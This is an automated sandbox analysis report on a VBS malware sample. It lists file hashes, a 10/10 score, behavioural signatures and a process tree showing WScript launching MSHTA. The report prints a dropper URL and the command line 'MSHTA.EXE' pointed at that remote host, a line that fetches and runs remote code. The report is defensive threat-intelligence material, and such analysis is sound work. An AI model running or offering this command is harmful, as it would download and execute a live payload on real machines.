Analysis
-
max time kernel
44s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64 arch:x86 image:win7-20220715-en locale:en-us os:windows7-x64 system -
submitted
09-08-2022 18:59
Static task
static1
Behavioral task
behavioral1
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win7-20220715-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win10v2004-20220721-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
LIYDOERWQPOKERHAVAXOCI.vbs
-
Size
1KB
-
MD5
7fa6c86604b4b5706beac109127af386
-
SHA1
aeac233400b02928f3a025a740bcfd6e2f85cd8a
-
SHA256
04d8d89df7a3ebe9d24b4635b6f4760e81465d672cb9f010e020b336b2d811ec
-
SHA512
e79fe1be4f96e06da8f60e7bb486e854bbf66509c637f08734771cc6a26a8051a281f8e484145252cd2e90d7196175761ad14f4cf00122ae9431a330ba189330
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://tradeguru.com.pk/enc.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXE
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1248 | 1836 | MSHTA.EXE |
-
Blocklisted process makes network request 4 IoCs
Processes:
MSHTA.EXE
flow | pid | process
4 | 1248 | MSHTA.EXE
5 | 1248 | MSHTA.EXE
6 | 1248 | MSHTA.EXE
7 | 1248 | MSHTA.EXE
-
Modifies Internet Explorer settings
Processes:
MSHTA.EXE
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main | MSHTA.EXE
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"
PID:1672
-
C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc.txt
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1248